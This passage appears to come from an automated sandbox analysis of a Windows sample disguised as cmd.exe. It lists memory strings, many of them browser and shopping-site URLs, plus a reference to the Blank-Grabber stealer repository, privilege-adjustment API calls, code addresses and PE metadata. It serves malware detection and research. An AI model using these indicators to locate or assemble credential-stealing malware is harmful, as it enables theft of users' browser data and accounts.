Source: powershell.exe, 0000002A.00000002.1859004442.000002168E115000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: cmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: cmd.exe, 00000001.00000002.2103718969.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: cmd.exe, rar.exe.0.dr | String found in binary or memory: https://sectigo.com/CPS0
Source: cmd.exe, 00000001.00000003.1772966078.000001C91692E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C91692E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1758937487.000001C91688E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefox
Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: cmd.exe, 00000001.00000002.2096102942.000001C916430000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: cmd.exe, 00000001.00000002.2096102942.000001C9164F1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
Source: cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: cmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://weibo.com/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.aliexpress.com/
Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.ca/
Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.co.uk/
Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/
Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.de/
Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.fr/
Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.avito.ru/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.baidu.com/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.bbc.co.uk/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ctrip.com/
Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.co.uk/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.de/
Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ifeng.com/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.iqiyi.com/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.leboncoin.fr/
Source: cmd.exe, 00000001.00000003.1772966078.000001C91692E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C91692E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1785608617.000001C916B44000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098986140.000001C9170A0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1758937487.000001C91688E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1758937487.000001C91688E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_c
Source: cmd.exe, 00000001.00000003.1758937487.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: cmd.exe, 00000001.00000003.1788462213.000001C9168E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: cmd.exe, 00000001.00000002.2100068134.000001C917A74000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.olx.pl/
Source: cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2103626383.00007FFDFB414000.00000004.00000001.01000000.0000000F.sdmp, cmd.exe, 00000001.00000002.2102504128.00007FFDFB0B3000.00000004.00000001.01000000.00000010.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.dr | String found in binary or memory: https://www.openssl.org/H
Source: cmd.exe, 00000000.00000003.1699462704.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1710533213.000001C9164F3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1711375061.000001C9164F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1707179329.000001C9164F3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1710834242.000001C9164F6000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr | String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr | String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/
Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: cmd.exe, 00000001.00000002.2098986140.000001C917160000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.wykop.pl/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
Source: cmd.exe | Process created: 50

              System Summary

Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A403A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A42B57C: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AEF8BD0
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF169D4
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AEF1000
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF01BC0
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF15C70
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF13C80
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF16488
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF10938
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AEFA34B
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AEFA4E4
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF02C80
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF03A14
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF021D4
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF019B4
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF0DACC
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF1411C
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF08154
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF01FD0
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF017B0
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF118E4
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF0DF60
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF19798
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AEF9870
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF08804
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF03610
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF01DC4
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF05DA0
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF15EEC
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF09F10
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AEFAD1D
Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF0E5E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD98D03027
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3EABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3F0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A417B24
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A40AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3F54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3F1180
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3E82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3E1884
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3EB540
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A439B98
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A424B38
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3F8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A425C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3EDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A436D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A409D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A410D20
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A40D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A4269FD
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3E49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A41FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A425A70
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3ECB14
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A44AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A44AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A415F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A41C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3F3030
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A424FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A44DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A418040
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A410074
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A40C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A400104
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A4400F0
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A429D74
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3F1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3EEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A431DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3ECE84
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A42EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A42AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A43FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3F8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A41AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3E9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A3F2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41037465_2_00007FF69A410374
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40C3E065_2_00007FF69A40C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42546865_2_00007FF69A425468
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40D45865_2_00007FF69A40D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3EA50465_2_00007FF69A3EA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42216465_2_00007FF69A422164
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3FE21C65_2_00007FF69A3FE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4281CC65_2_00007FF69A4281CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4441CC65_2_00007FF69A4441CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4202A465_2_00007FF69A4202A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40724465_2_00007FF69A407244
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3EF24C65_2_00007FF69A3EF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43226865_2_00007FF69A432268
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43131465_2_00007FF69A431314
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43832C65_2_00007FF69A43832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3FD2C065_2_00007FF69A3FD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3E42E065_2_00007FF69A3E42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F17C865_2_00007FF69A3F17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4067E065_2_00007FF69A4067E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3E888465_2_00007FF69A3E8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F289065_2_00007FF69A3F2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4318A865_2_00007FF69A4318A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42190C65_2_00007FF69A42190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41090465_2_00007FF69A410904
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41D91C65_2_00007FF69A41D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4138E865_2_00007FF69A4138E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A40F5B065_2_00007FF69A40F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F859865_2_00007FF69A3F8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41F59C65_2_00007FF69A41F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43260C65_2_00007FF69A43260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4165FC65_2_00007FF69A4165FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A43766065_2_00007FF69A437660
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A41A71065_2_00007FF69A41A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42071065_2_00007FF69A420710
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A42270065_2_00007FF69A422700
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F86C465_2_00007FF69A3F86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4486D465_2_00007FF69A4486D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: String function: 00007FF69A3F8444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: String function: 00007FF69A4249F4 appears 53 times
              Source: C:\Users\user\Desktop\cmd.exeCode function: String function: 00007FF70AEF2710 appears 52 times
Source: cmd.exe | Static PE information: invalid certificate
Source: cmd.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rar.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: cmd.exe | Binary or memory string: OriginalFilename vs cmd.exe
Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_decimal.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibsslH vs cmd.exe
Source: cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs cmd.exe
Source: cmd.exe, 00000000.00000000.1697422056.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWPR.exen' vs cmd.exe
Source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs cmd.exe
Source: cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs cmd.exe
